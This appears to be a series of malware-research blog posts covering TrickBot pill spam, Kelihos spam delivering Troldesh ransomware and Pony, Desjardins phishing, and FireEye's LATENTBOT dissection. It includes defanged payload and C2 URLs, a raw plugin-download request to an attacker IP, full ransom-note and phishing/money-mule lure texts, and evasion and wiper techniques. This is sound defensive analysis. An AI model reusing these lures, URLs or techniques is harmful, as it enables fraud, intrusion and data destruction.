Fig. 4: File being downloaded as Png

Fig. 5: Downloaded Executable
These downloaded files are also the TrickBot binary.

Fig. 6: Setup.exe under WinApp
The downloaded files being converted into "Setup.exe" and can be found under the Roaming/WinApp directory.

Second Stage - Spam aka 'Pill Spam'

After the completion of initial analysis, there was a strange pattern observed when analyzed the Wireshark traffic with 'IMF' filter. Our network (10.0.2.15) was used as a server along with being a proxy. Our address was proxy for other messages coming from 208.84.244.139 (a mailserver hosted by Terra Network Operations in Coral Gables, Florida) and 82.208.6.144 (a mailserver in Prague, Czech Republic.) Also, our network was sending outbound spam.

Fig. 7: Wireshark capture with IMF filter


Outbound Spam

As can be seen in the figure 7, top 3 spam messages are outbound and are being sent from our network. There were total of 6 different spam messages with different subject line and links. The email is mentioned below:

Fig. 8: Email message

Following were some of the subjects and urls that were spammed.

Subject                                                    URL
 Affordable-priced Brand Pilules http://martinagebhardt[.]hu/w/1gox[.]php
 Blue Pills easy-ordering http://host[.]teignmouthfolk[.]co[.]uk/w/zxaj[.]php
 Eromedications Wholesale http://martinagebhardt[.]hu/w/1pyo[.]php
 Great offers on Male Pills http://host.bhannu[.]com/w/w10x[.]php
 Here we sell Branded tablets http://host[.]selfcateringintenerife[.]co[.]uk/w/l5fz[.]php
 Online offers Branded pharmacueticals http://host[.]iceskatemag[.]co[.]uk/w/lztg[.]php

When we visited these links they redirect to a counterfeit pill website featuring pain and anxiety medications such as Xanax, Tramadol, Ambien, Phentermine, and more.  A depiction of the pill website with affiliate id is shown below.


Fig. 9: Redirect to a pill website with aff id

When we tried to analyze these weblinks individually, they contained a list of php under the 'w' directory. Last, when tree walked just to the domain it led to a dating/porn website.

Inbound Spam

As can be seen in the Figure 3, there is a significant amount of inbound traffic that seems to be different spam messages redirected through our machine. It can be inferred that our network is used as proxy to avoid back tracking and detection. There were bunch of different domains that were used in the "From" addresses of these messages. An example of one such message is:

From: Walmart
Reply-To: newsletters@walmart.com
To: Grazielle
Subject: =?UTF-8?Q?Huge_Clearance_savings_you_can=E2=80=99t_miss?=

The capture contained different messages from all the following domains mentioned below:

aggadi.com.br
aol.com
belissimacosmeticos.com.br
catcorlando.com
citrosuco.com.br
connect.match.com
uspoloassn.com
newsletter.coastalscents.com
email.modait.com.br
facebookmail.com
id.apple.com
itmae.com.br
limecrimemakeup.com
offers.dominos.com
pcpitstopmail.com
photojojo.com
pof.com
sigmabeauty.com
submamails.com
twitter.com
walmart.com

Credential Exchange

TrickBot displays a similar characteristic to the Kelihos Botnet , in a sense that it logs in to the mail server with the stolen credentials before it starts to send spam. There is a massive number of stolen credentials that were visible in plain text being distributed by the botnet.

Fig. 10: Stolen Credentials reconstructed in Network Miner


With these analysis, it is safe to assume that TrickBot is extremely tricky!! Researchers at UAB are focused to try and uncover more secrets of this malware. Will keep everyone posted with our new findings!!

To sum up, TrickBot is not only targeting your BANKING credentials but also sending you SPAM.


NoMoreRansom aka Troldesh Ransomware Delivered by Kelihos

My favorite guest blogger Arsh Arora, a malware analyst and Ph.D. researcher at UAB,  is back with new and interesting facts about Kelihos, a botnet family that he has been tracking for a year and half and providing some great intel about to the community and law enforcement. Today, he noticed that it is delivering URLs leading to Troldesh ransomware. Take it from here, Arsh ...

Kelihos botnet delivering Troldesh Ransomware impersonating Bank of America

No_More_Ransom, aka Troldesh encryption ransomware, is being delivered by Kelihos in the form of embedded URLs within the email messages. The delivery mechanism is similar to previous cases of ransomware spammed by Kelihos. In early July, Kelihos introduce itself to the world of ransomware by spamming links to Wildfire ransomware followed by CryptFIle2 ransomware in August. Then, it shifted its focus towards different banking trojans such as Panda Zeus, Nymain and Kronos. Now, it took a complete circle and struck back with Troldesh encryption ransomware. The funny thing is that the ransomware encrypted the files with the extension ".no_more_ransom". Moreover, the URLs spammed were redirected to download a JavaScript file and a Microsoft Word document. This is the first time that Kelihos malware has used JavaScript to infect users.

Another interesting observation was that this spam campaign was specifically geo-targeting Australian email addresses ending with ".au".  ".pl" email users were getting dating spam, while ".us" extension emails were being invited to sign up as Money Mules.  All other email TLDs were getting the traditional pharmaceutical spam.

NoMoreRansom aka Troldesh Ransomware

While doing the daily run of malware, one of my fellow researchers at UAB, Max Gannon, noticed a different behavior in the Kelihos botnet. It was sending embedded links using the Credit Debt theme. The most important fact is that some of the URLs were redirected to download a .zip file containing a JavaScript file, while other links download a Microsoft Word document. When writing this blog, most of the URLs were still live. 

Subject: Please Settle Credit Arrears Shortly

Dear Client!

Our Credit Department has done research on your payment record for last year and learned that payments had not been made for last 3 months. We are now working on the issue pertaining to ways to help you with fulfilling liabilities and settling these arrears.

At the same time, we realize you may have had excellent reasons for such payment breakdown. That is exactly why we are contacting you now. Notwithstanding, if you are not proceeding your debt settlement, we will have to engage our enforcement units in commencing the law-suit case against you. This is the compulsory measure, so unfortunately, we may not help you.

Please process at least the very first payment at the earliest possible time. Else, charges may apply, and then the trial may be run.

We have made the full report of your situation. It contains the payment history, the total debt amount effective today, and further recommendations on arranging the issue. Please open and be guided with instructions as soon as possible.

The file can be found here: 
hxxp://greatwesternco[dot]com/wp-content/themes/twentyten/redirect[dot]php

Sincerely Yours,
Bank of America
Customer Relations Department
.

The following are the different subject lines that were spammed:
URLs that downloaded a .zip file containing JavaScript

Subject - Credit Department Discovered Your Debt - 
hxxp://eileenparker[dot]com/wp-content/themes/twentyten/redirect[dot]php

Subject - Pay for Credit Debt when Possible - 
hxxp://thehousepartnership[dot]co[dot]uk/wp-content/themes/twentyten/redirect[dot]php

Subject - Please Settle Credit Arrears Shortly - 
hxxp://chris-smith-web[dot]com/wp-content/themes/twentyten/redirect[dot]php

Subject - You Have a 3-Month Credit Debt - 
hxxp://infopro[dot]it/wp-content/themes/twentyeleven/redirect[dot]php

Fig. 1: Zip file downloaded with the embedded URL link

URLs that downloaded a Microsoft Word document

Subject - Please Settle Credit Arrears Shortly - 
hxxp://greatwesternco[dot]com/wp-content/themes/twentyten/redirect[dot]php

Subject - You Have a 3-Month Credit Debt - 
hxxp://greatwesternco[dot]com/wp-content/themes/twentyten/redirect[dot]php

URL that were unreachable

Subject - Pay for Credit Debt when Possible - 
hxxp://starsounds[dot]net/wp-content/themes/twentyeleven/redirect[dot]php - Down

Infection by JavaScript has not been an associated behavior with Kelihos. Hence, it can be considered a noticeable change and well-thought out strategy by the bot operators.

Hashes of the JavaScript and Word document are:

    1d57eba1cb761b99ffcf6bc8e1273e9c  instructions.doc
711881576383fbfeaaf90b1d6c24fce0  instructions.js

On the other hand, embedded URLs for Microsoft Word documents have been seen before. The document performed in a similar fashion requesting to enable the macros by clicking "Enable Content" aka "Encrypt Me" button. After this process it downloads a payload from the following link:

hxxp://95[.]163[.]127[.]179/777[.]exe
MD5 - 8441efe3901a0ec7f18c6ef5159877cc

Virus Total Link - 777.exe VT

After the file is downloaded, it encrypts the system with the Troldesh encryption ransomware and adds the "no_more_ransom" extension at the end of each file on the system. The ransom note on the desktop was displayed in Russian as well as English.

Fig. 2: Desktop screen after encryption

Fig. 3: Ransom Note found in text ReadMe.txt

All the important files on your computer were encrypted.
To decrypt the files you should send the following code:
xxxxxxxxxxxxxxxxxxxxx
to e-mail address 2Lynness.Taftfera1990@gmail[dot]com .
Then you will receive all necessary instructions.
All the attempts of decryption by yourself will result only in irrevocable loss of your data.
If you still want to try to decrypt them by yourself please make a backup at first because
the decryption will become impossible in case of any changes inside the files.
If you did not receive the answer from the aforecited email for more than 48 hours (and only in this case!),
use the feedback form. You can do it by two ways:
1) Download Tor Browser from here:
https://www.torproject.org/download/download-easy.html.en
Install it and type the following address into the address bar:
http://cryptsen7fo43rr6.onion/
Press Enter and then the page with feedback form will be loaded.
2) Go to the one of the following addresses in any browser:
http://cryptsen7fo43rr6.onion.to/
http://cryptsen7fo43rr6.onion.cab/

The above is a plain text version of the ransom note. As it can be seen, a Gmail address is being use, which is one of its kind behavior.

Troldesh did not stop trolling the victim there, it downloads the PONY malware and contacts its command and control center at this location:

 hxxp://ipieceofcake[dot]com/wp-content/uploads/2016/04/gate[dot]php

When I visited the link it was down, but thanks to our Malware expert Neera Desai who works for PhishMe and is pursuing her Masters in Computer Forensics at UAB, we were able to visit the panel page of the Pony malware.

Fig. 4: Pony malware panel page

This was really fascinating as Kelihos spammed URLs for Troldesh encryption ransomware with redirects to a malicious Microsoft Word document and a zip file containing JavaScript. The files eventually encrypt the system but it also downloads the Pony malware to steal all the information from the victim's computer. Hence, causing a double blow to the victim.

Money Mule Spam 

Kelihos botnet was not in a mood to stop. It also sent Money Mule spam geo-targeting users with the ".us" United States email address. It impersonated a company from 'China looking for employees'. 

Text of the email is as follows:

Subject: China company is looking for employees

We are the greatest transport company in China involved in 
transportation of high-dimension goods across the globe. At present, 
we are aimed at expanding by opening offices across the globe for 
deliveries of small consignments. We are looking for employees to 
open offices and ensure services (deployment and supervision of 
packages). All costs for the office establishment are undertaken by 
the organization. During the first month of your job, you and our 
employees are to be engaged in searching for the storage structure. 
You will be also required to appoint some amount of orders to your 
home address (not more than 10kg parcels a day) in order to check 
them for flaws and ship forward with pre-paid labels. We have a 
certain flow of parcels to date, and the work is already jogging on; 
if you are ready to start your operation right away, we are ready to 
pay 2800$ a month. In due course your salary will increase up to 
3500$ if you agree to work in the future office.

You have the following options of working with us:
1. You are working at home for the first month, receiving packages 
and shipping them forward; starting looking for an office place in 
your town (all the instructions you will receive from our managers)
2. You continue to work from home and get 2900$ every month, plus 
bonuses for fast shipped package
3. If something doesn't fit you and you decide to stop the job with 
us, we will pay you monthly salary and be waiting for you again in 
our team in the future!

If you have any questions please contact us at: kia01915@aol[dot]com

All costs for establishment the office are taken by the company, 
shipping is made with prepaid labels, this job does not require any 
financial investment from you. You can also combine this work with 
another one if you decide to work in the office in the future.
The convenient control panel of a corporate website will help you to 
track parcels, bonuses you are to get for a shipped package, and your 
personal information for salary and further job instructions.

The company ensures the following advantages:
1. Health benefits
2. Paid vacations and sick leaves
3. Paid flight tickets, gasoline

This is a temporary offer, as soon as we have a team of employees in 
your staff the vacancy will be closed.

Please contact our HR manager for further details: kia01915@aol[dot]com
.
Other subject lines that were spammed in the same theme are mentioned below with their corresponding reply-to email address.

Subject - China company is looking for employees - kia01915@aol[dot]com
Subject - We are hiring new employees to our office - kia01915@aol[dot]com
Subject - We are hiring new employees to our office - bree10682@aol[dot]com

Subject - Job opportunity - marquerite23894@aol[dot]com
Subject - Open vacancy - marquerite23894@aol[dot]com

The other thing to note is that all of the email addresses use AOL domains, which is a unique thing in itself.


To conclude, Kelihos has been surprising the researchers quite often and it has become necessary to keep track of different activities of the botnet. The ransomware inclusion brings interesting twists from the research as well as law enforcement. Another thing that I found while searching for NoMoreRansom was a group established by key leaders in the community to fight against the rise of ransomware. 

So is the extension of NoMoreRansom a challenge to the people fighting it? Who knows? 
FYI: Things are about to get interesting!

Kelihos Botnet sending geo-targeted Desjardins Phish to Canadians

As we mentioned in our blog last week (see: Kelihos botnet sending Panda Zeus to German and UK Banking Customers), the Kelihos botnet is now using "geo-targeting" based on the ccTLD portion of email addresses.  Today, those recipients whose email address ends in ".ca" are receiving a French language spam message advertising one of many Desjardins phishing websites:

<== French Desjardins Phishing Email || Google Translate ==> 
Some of the email subjects being used include:

Subject:  Renouvellement de votre compte Desjardins
Subject:  Solutions en ligne Desjardins
Subject:  Veuillez regulariser votre compte Acces
Subject:  Desjardins Reactivation
Subject:  Reactivation de votre compte AccesD

Each of these URLs is currently resolving to the IP address 5.166.183.135:

  hxxp://client.accesd.com-page-reactivation-4955-accesd-desjardins[.]com/web 
  hxxp://espace.client.accesd.com-page-reactivation-3953-accesd-desjardins[.]com/login 
  hxxp://connection.desjardins.com-page-reactivation-3953-accesd-desjardins[.]com/id 
  hxxp://membre.espace.desjardins.com-page-reactivation-1734-accesd-desjardins[.]com/page
  hxxp://membre.accesd.com-page-reactivation-5354-accesd-desjardins[.]com/enligne
  hxxp://membre.desjardins.com-page-reactivation-5354-accesd-desjardins[.]com/accesd 
  hxxp://espace.client.accesd.com-page-reactivation-1734-accesd-desjardins[.]com/login


Here is a pictorial walk-through of the phishing website:

We begin by entering a Credit Card number -- it must be a number that passes a Luhn check:


After entering a valid CC#, the next page asks the phishing victim for three security questions and their answers:


And lastly, the phisher's try to get any and all possible additional information they can!

 
Only after entering a valid password and a number that matches the mathematical rules for a Canadian Social Insurance Number does the phisher send the victim to the real Desjardins website!

Beware, Canadian friends!   And let us hope that our shared victimization increases our mutual law enforcement agencies desire to stop this botnet!



LATENTBOT: Trace Me If You Can

FireEye Labs recently uncovered LATENTBOT, a new, highly obfuscated BOT that has been in the wild since mid-2013. It has managed to leave hardly any traces on the Internet, is capable of watching its victims without ever being noticed, and can even corrupt a hard disk, thus making a PC useless.

Through our Dynamic Threat Intelligence (DTI), we have observed multiple campaigns targeting multiple industries in the United States, United Kingdom, South Korea, Brazil, United Arab Emirates, Singapore, Canada, Peru and Poland – primarily in the financial services and insurance sectors. Although the infection strategy is not new, the final payload dropped – which we named LATENTBOT – caught our attention since it implements several layers of obfuscation, a unique exfiltration mechanism, and has been very successful at infecting multiple organizations.

Some of the main features of LATENTBOT are listed below:

a)    Multiple layers of obfuscation
b)    Decrypted strings in memory are removed after being used
c)    Hiding applications in a different desktop
d)    MBR wiping ability
e)    Ransomlock similarities such as being able to lock the desktop
f)    Hidden VNC Connection
g)    Modular design, allowing easy updates on victim machines
h)    Stealth: Callback Traffic, APIs, Registry keys and any other indicators are decrypted dynamically
i)    Drops Pony malware as a module to act as infostealer

LATENTBOT Overview

Stealth being one of its traits, LATENTBOT will only keep malicious code in memory for the short time that is needed. Most of the encoded data is found either in the program resources or in the registry. A custom encryption algorithm is shared across the different components, including in encrypting its command and control (CnC) communications. Due to this, its family binaries are detected with a generic name such as Trojan.Generic:

https://www.virustotal.com/en/file/39af310076282129e6a38ec5bf784ff9305b5a1787446f01c06992b359a19c05/analysis/

LATENTBOT itself is not targeted in nature – it has been observed in multiple industries – but it is selective in the types of Windows systems to infect. For example, it won’t run in Windows Vista or Server 2008. LATENBOT also uses compromised websites as CnC infrastructure, making infection easier and detection harder.

Based on passive DNS information and similar samples found in the wild, it is possible that LATENTBOT was created around mid-2013. Throughout the course of 2015, we observed multiple successful infection campaigns, as seen in Figure 1.

 

Figure 1: Targeted Countries and LATENTBOT CnC Locations

Infection Vector

The preliminary steps to infect victims with LATENTBOT already contains multiple layers of obfuscation as described in Figure 2: Infection Phase.


 
Figure 2: Infection Phase

Step 1

Malicious emails containing an old Word exploit are created with the Microsoft Word Intruder[1] (MWI) builder and sent to the victims.

Step 2

When the attached Word document is opened, an embedded malicious executable runs, beaconing to the MWISTAT Server (see Figure 3) for two main purposes:

1.    Campaign tracking
2.    Second stage binary download


 
Figure 3: MWI Beacon
                    
During our analysis, the Word documents downloaded LuminosityLink as the second stage binary. LuminosityLink is a full-featured RAT that has the ability to steal passwords, record keystrokes, transfer files and activate attached microphones or webcams.

Step 3

Since LuminosityLink is a RAT that offers multiple capabilities to fully control the infected box, it is surprising that the RAT downloaded another payload from a secondary CnC at emenike[.]no-ip.info (180.74.89.183). This new module is LATENTBOT which offers new capabilities that will be detailed in this report.

Dissecting LATENTBOT

The analysis will concentrate on the third stage LATENTBOT binary lsmm.exe (af15076a22576f270af0111b93fe6e03) dropped in Step 3 above, but we are far from the final stage. Another similar binary that was part of our analysis is aya.exe (1dd0854a73288e833966fde139ffe385), which performs the same actions. Let’s take an in-depth look at this interesting piece of malware.

LATENTBOT is an obfuscated .NET binary, which contains an encoded resource object. This object is the fourth stage payload that is decoded using the algorithm seen in Figure 4.

 

Figure 4: XOR routine to decode embedded resource

The fourth stage payload is also a .NET binary protected and obfuscated with ConfuserEx v0.5.0-10-g6ebeec5.The fourth stage binary will open the .NET programs: RegAsm.exe and CvTres.exe from %windir%\Microsoft .Net\Framework\v2.050727\ and use process hollowing to replace them with malicious code in memory.

The CvTres.exe process is replaced with a Visual Basic UPX-packed binary extracted from the binary’s resources, as seen in Figure 5.

 
Figure 5: Process hollowing to replace the contents of CvTres.exe in memory

The binary creates a registry key for persistence with the hardcoded binary name dlrznz68mkaa.exe (a copy of the original aya.exe) at the location shown in Figure 6:

HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\load

 

Figure 6: LATENTBOT persistence

The folder aFwLiiV and filename dlrznz68mkaa.exe are hardcoded in the resources section of the Confuser .NET binaries. Figure 7 shows the resources content from aya_decrypted.exe.



 
Figure 7: Confuser .NET resources showing malicious directory and file name

RegAsm.exe will be replaced in memory with a shellcode loader that opens %windir%\system32\svchost.exe and uses the same process hollowing technique to load a second shellcode loader that eventually will decode and execute a fifth stage Delphi binary in memory.

At this point, let’s see the new stages discovered in Figure 8:

 

Figure 8: The many stages of LATENTBOT

Figure 9 shows a quick view of one of the decoder functions inside the second shellcode loader that eventually decrypts the fifth stage Delphi Binary:

 

Figure 9: Complex decoder function

Fifth Stage Delphi Binary

This is another launcher that uses the same process hollowing technique we saw previously to execute the sixth stage binary in another instance of svchost.exe. This new binary is encoded in the resources section and decoded at runtime with the function from Figure 10.


 
Figure 10: Decoder for sixth stage binary

The process tree at this point with aya.exe, RegAsm.exe and the two instances of svchost.exe can be seen using the Process Explorer tool in Figure 11, with the sixth stage being suspended:



 
Figure 11: Multiple Injections View

Sixth Stage Delphi Binary

The sixth stage is highly obfuscated; multiple encoded strings can bee seen which represent API function names, CnC IP, POST/GET parameters, HTTP headers, processes names, and so on, all of which are decrypted at runtime.  

First the malware will performs several validations. If the Windows OS version is 6.0 (Windows Vista, Windows Server 2008) or if the malware’s parent process is not svchost.exe or explorer.exe (see Figure 12) then it will exit.

Running Out of Battery?

If LATENTBOT is running on a laptop, it will query the battery status via GetSystemPowerStatus and if the battery is running Low or Critical, it will call SetThreadExecutionState try to prevent the system from sleeping or turning the display off.


 
Figure 12: Processes names decrypted to be validated

Is the BOT_Engine plugin installed?

Now LATENTBOT will check if its plugins are already downloaded by querying the registry key below which should contain subkeys with the encrypted modules:

HKCU\Software\Google\Update\network\secure

If plugins are found, LATENTBOT will proceed to load BOT_ENGINE, which is the main module (described in more detail below). Otherwise, it will download the required plugins from a CnC server as explained in the next section.

Data Exfiltration

If the plugins were not found, LATENTBOT will proceed to download them, but it will first validate that the connection to the CnC server is alive by making the TTP request shown in Figure 13:

 
Figure 13:  LATENTBOT initial beacon

LATENTBOT then verifyies that the HTTP response is one of the following:

•    200: The requested resource was found
•    302: Found but in a different URI (Redirection)
•    307: Similar to 302

If none of the valid HTTP responses shown above are received, it will try to connect again every 20 seconds indeterminately.

Assuming a valid HTTP response was received, LATENTBOT will proceed to generate a beacon. First, the URI is generated based on information from the infected host; two examples are shown below:

forum?datael=US-20-503634784811&ver=4006&os=2&acs=0&x64=0&gr=load-1.7.1.20&random=wopvrudsks

forum?datael=US-70-347126827175&ver=4006&os=5&acs=0&x64=0&gr=load-1.7.1.20&random=dbvcwhctdn

Where:
•    All the GET parameters are decoded at runtime. For example, tgsz0D decodes to &gr.
•    datael: <locale>-<OS_Version>-<random_number>, where <OS_Version> is one of the following:
    o    10 = Windows 2000 (5.0)
    o    20 = Windows XP (5.1)
    o    30 = Windows XP 64-Bit, Windows Server 2003/R (5.2)
    o    40 = Windows Vista, Windows 2008 (6.0)
    o    70 = Windows 7, Windows Server 2008 R2 (6.1)
    o    80 = Windows 8, Windows Server 2012
    o    90 = Windows 8.1, Windows Server 2012 R2
•    random and the <random_number> used by datael are set dynamically. For random, 10 characters are randomly selected from the buffer abcdefghijklmnopqrstuvxyz. datael randomly selects 12 integers from the buffer 0123456789012345678912345678. The seed is initialized with the Delphi function Randomize()and the Delphi Random() function is called on each loop iteration, making the callback different on each request.
    o    Note: The <random_number> is stored in the following registry key (created at runtime): \HKCU\Software\Adobe\Adobe Acrobat\data
•    os: Windows OS Major version, using the same codes as OS_Version above.
•    acs: possible values are 1 or 0. 1 is used if the malware is running under SYSTEM privileges.
•    x64: flag identifying the OS architecture.
•    The ver and gr parameter values are hardcoded.

Then the URI is encoded using a three steps algorithm. The following will describe each step:

Step 1: Custom substitution routine

This routine substitutes valid URI characters using custom hardcoded lookup tables, depending on the usage (encoding/decoding) different lookup tables are used. Figure 14 shows the lookup table used during the decoding phase:
 
                  
Figure 14:  Decoding lookup table

This routine encodes/decodes one WORD at a time, each byte is shifted right or left depending on the need (encoding/decoding) with a specific value depending on the byte position as shown in Table 1:

Table 1: Shift values

The result is added after each shift, as shown in Figure 15.


Figure 15: Shift calculations
Note: For encoding, depending on a parameter, the substitution routine can choose from three different lookup tables; for this sample, only one lookup table was used every time.

Step 2: XOR Modifier

The substituted data is passed is passed ot the XOR modifier shown in Figure 16.



Figure 16: XOR Modifier routine

Different XOR modifiers are used as shown in Table 2:


Table 2: XOR modifier

The same XOR modifier algorithm has been used by iBanking/TauSpy Android malware[2].

Step 3: Base64 encoding

The resulting encoded URI is then base64 encoded.

The whole algorithm can be expressed as follows:
Encryption:
encoded_uri  = base64_encode(substitute (xor_modifier(modifier, plain_text_uri)))
Decryption:
plain_text_uri = xor_modifier(modifier, substitute(base64_decode(encoded_uri)))

By applying the substitution and XOR algorithms described above to the original URI:

forum?datael=US-20-503634784811&ver=4006&os=2&acs=&x64=0&gr=load-1.7.1.20&random=wopvrudsks

we get the following encoded URI:

Adl7k+v9qQGCaZti0LS9v++uFb6axeFE2twthNT9s3K6/oG0xjQS2Gqk+Udja91kch3nwphGANCtdr83tXSAaLJEi/qmG3xmKKPwR8lFncN9i93yfHRxFQ2EBC

This URI is transformed with standard Base64 encoding, resulting in:

QWRsN2srdjlxUUdDYVp0aTBMUzl2Kyt1RmI2YXhlRkUydHd0aE5UOXMzSzYvb0cweGpRUzJHcWsrVWRqYTkxa2NoM253cGhHQU5DdGRyODN0WFNBYUxKRWkvcW1HM3htS0tQd1I4bEZuY045aTkzeWZIUnhGUTJFQkM=

Which finally is used to send the beacon shown in Figure 17:

Figure 17: Fully encoded LATENTBOT beacon

The CnC replies with:
MDVvWVc2K3J5ZGV4ZlNyM0lycjQ5TFhkSnBmZWJTbms1Zkx0aEQzNWxqaFlqVS9XczN4MTNqV1RQOWtHWUF1ZERidzdkR0ZOdjI1UHAzT1pYcktBM2l5OGlWU04zMjByZDExOFNVREdObDk3QjdPNWtQUjhBU05jcjVybXR1Mkg=

The decoded URI yields:

mod:http://46.165.246.234/m/:Bot_Engine-A35CB08FB078051B27894BCD380EAC43-229376-018701-881384-8;

Which is actually the name of a module (Bot_Engine, and a unique ID) to be downloaded later during execution.

Downloading the Plugins

At this point, LATENTBOT is ready to start downloading the different plugins by sending the beacon shown in Figure 18:

GET /m/484588.zip HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 37.220.9.229
Cache-Control: no-cache


Figure 18: LATENTBOT download beacon

The modules names pretend to be ZIP files but are in fact encoded data that is saved into the registry key secure as shown in Figure 19.


Figure 19: Registry keys storing the malicious plugins

Decrypting the plugin names using the XOR modifier algorithm from Figure 16 with modifier 0x2328 gives the following module names:
1.    hdtWD3zyxMpSQB = Bot_Engine
2.    QdW/DoI2F9J = Security
3.    RRrIibQs+WzRVv5B+9iIys+17huxID = Remote_desktop_service
4.    VRWVBM6UtH6F+7UcwkBKPB = Vnc_hide_desktop
5.    zRlBb9ofmNVErtdu = Pony_Stealer

The registry values shown at the bottom of Figure 19 have a specific purpose depending on the plugin being used. The values can be used as status or integrity-check flags or used to store encoded binaries.

Figure 20 is a diagram showing how the plugins will be loaded:



Figure 20: Plugins Architecture

InjectionHelper

A new DLL (InjectionHelper, see Figure 20) is decoded from the resources of the sixth stage Delphi binary and loaded to the current process via BTMemoryLoader, which will eventually load (via the jMex export) the main plugin BOT_ENGINE.
The main purpose of InjectionHelper is to load svchost.exe and replace it in memory – via the process hollowing technique – with the binary supplied as an argument. This DLL is actually used by other plugins any time a new binary needs to be loaded in memory.

Once InjectionHelper loads the BOT_ENGINE plugin, it will re-inject itself into new instances of svchost.exe multiple times before commencing execution, as seen in Figure 21.

 
Figure 21: BOT_ENGINE process hollowing chain

Plugins Description

BOT_ENGINE & SECURITY

BOT_ENGINE is the main plugin responsible for loading the rest of the plugins. The loading technique is the same as previously documented using the BTMemoryLoader Library. BOT_ENGINE communicates closely with the SECURITY module. The SECURITY module checks the system to see if any antivirus solution was installed, using a list of AV products’ default installation paths (see Appendix 1). This list is encrypted with the algorithm from Figure 16 using the modifier 0xBB8.

If an AV is found on the system, the callback will include a GET parameter av=<number> (e.g., Avast will be av=1).

There is also a check for GPUs with EnumDisplayDevice that tries to detect display cards from NVidia, ATI and Radeon and report the result with the vidtype parameter:
3 possible values:
•    vidtype=1  for NVidia
•    vidtype=2   for ATI or Radeon
•    vidtype=0 for none of the above

BOT_ENGINE is a Delphi program similar to the sixth stage Delphi loader, but with patched stubs and new threads to do specific tasks. It extracts data from resources and verifies their signature using a public key embedded in the malware.
                                             
Extracting the public key

A key BLOB was imported via CryptImportKey API. The BLOB contains a 2048-bit RSA public key used to verify signatures.

Following the BLOB Header, we can find the 2048 bits RSA public key as shown in Figure 22.

 
Figure 22: Public key BLOB Structure in memory

Other GET parameters that may be sent are shown in Table 3.


Table 3: Other GET Parameters

After BOT_ENGINE is successfully installed and all the different checks are performed, a query is sent back to the CnC with the status of plugin installation along with any errors identified. The plugin GET parameter holds the plugin name.

Here is an example of a plain text beacon after the BOT_ENGINE plugin is successfully installed:

forum?data=US-20-164346373561&ver=4006&os=2&av=19&acs=&x64=0&gr=engine-1.7.1.20-s&li=load-1.7.1.20&plugins=Bot_Engine-881384-8&errcode=0&bk=0&note=0&dom=1&sockslog=0&vidtype=0&random=deabaotabf

Supported BOT_ENGINE commands are listed in Table 4:


Table 4: BOT_ENGINE CnC Commands

PONY Plugin

This plugin is a recent version of Pony Stealer 2.0 malware that comes with BITCOIN support to steal Bitcoin wallets as seen in Figure 23.



              
Figure 23: Bitcoin wallet

It looks for wallets for different cryptocurrencies (similar to VNC Plugin). Refer to List of Bitcoin Wallets and Currencies 1.

VNC Plugin

The VNC Plugin is actually more than what its name suggests - it has multiple features:

•    Implements a keylogger
•    ICMP Requests
•    MBR Wiper
•    Hidden VNC Remote Desktop
•    Manipulate the desktop
•    Intercept mouse events

Supported VNC module commands are listed in Table 5.

Table 5: VNC Plugin BOT Commands

Note: For every command executed, the BOT will send the encrypted status result to the CnC.

VNC Plugin command: killosanduninstalls

When this command is executed, the following steps will occur:

1. The malicious MBR wiper will be extracted and decoded from the VNC plugin’s resources and then injected into a new instance of svchost.exe via the InjectionHelper  The MBR Wiper overwrites the first 512 bytes of the hard drive represented by \\.\Physicaldrive0 and exits the injected process.
2.    The parent process will proceed to delete any traces of the malware from the registry and file system.
3.    Malicious process running are terminated.
4.    Then the status message “kill os function started + uninstall + shutdown mashine from 10 sec …” is sent to the CnC
5.    Finally a reboot is forced via the ExitWindowsEx API leaving the infected PC useless. A quick overview of this process is shown in Figure 24.


 
Figure 24: Killing the infected PC

The MD5 of the MBR Wiper (4d0b14024d4a7ffcff25f2a3ce337af8) was submitted to VirusTotal 7 times - from Russia - beginning in July 2013 and it has zero AV detections.

Running VNC

By running the VNC Plugin module on a system, it is possible to simply watch the end user (the victim, in this case) while going unnoticed. This differs from a normal RDP session, which would log off the end user and make the activity easy to identify.

The encoded VNC Plugin is stored in the registry under the key:

HKCU\Software\Google\Update\network\secure\

This key stores multiple encrypted subkeys as shown in Figure 19. The binary will be decoded and injected into svchost.exe via the InjectionHelper. The IP to connect to is encoded in the Resources section.

Before injecting the VNC Plugin, LATENTBOT will search for the following VNC processes running in the system and kill them to avoid conflicts:

•    tvnserver.exe – TightVNC Software
•    winvnc.exe – UltraVNC Software
•     vncserver.exe – RealVNC Software
•    vncservice.exe – RealVNC Software

VNC Plugin command: getinstallpluginlist

When this command is executed, the plugin list will be extracted from the registry, as already described. The registry values will be separated by a dash and the plugins by a comma. The data will then be encrypted and sent to the CnC server.

Figure 25 is an example of this decrypted plugin list:

 
Figure 25: Plugin list data decrypted in memory

VNC Plugin command: findgold

This searches the registry recursively starting at HKCU\Software\Classes for strings such as Bitcoin or TrueCrypt. It also searches the file system starting at %APPDATA%\Roaming and $APPDATA\Roaming\Bitcoin for wallet.dat, MultiBit or Electrum. See Figure 23 in the appendix for a full list of search terms.

VNC Plugin command: sendCtrlAltDel

This functionality is implemented by loading as_sas32.dll and calling its sendCtrlAltDel export.

Information Gathering

The plugin will gather system information and report it to the CnC server only, without using this to stop a process, which might trigger an alert.

The section Searching for malware analyst tools in Appendix 1 lists the program names and processes that LATENBOT is searching for. Keywords for SoftICE or filemon (which are retired tools) suggest this specific module was created long time ago. A specific ID will be assigned to every identified item identified and will be reported to the CnC server.

The same list of AVs listed in the BOT_ENGINE plugin were found in this one.

RDP Plugin

The built-in RDP client provides easy remote administration of the victim computer to the attackers, although this method would be more intrusive (potentially more noticeable to the victim) than the VNC Plugin.

Conclusion

In this paper we presented different plugins being used by LATENTBOT. Its architectural design allows the payloads to be easily updated with new functionalities, so we will be tracking the deployment of other plugins closely.

Although LATENTBOT is highly obfuscated, due to the multiple process injections performed, it is noisy enough to be easily detected in memory with a proper behavior-based solution. Outbound callback tracking and blocking is also mandatory in cases when the malware was able to bypass the security controls in place.

Acknowledgements:

Thanks to Nart Villeneuve for his help during this research.

[1] https://www.fireeye.com/blog/threat-research/2015/04/a_new_word_document.html

[2] Original version can be found here: https://github[.]com/strazzere/android-scripts/blob/master/Decoders/TauSpy-iBanking/rollingobfuscation.java

Appendix 1

IOCs:

HBI:

HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load  = %AppData%\Roaming\aFwLiiV\dlrznz68mkaa.exe

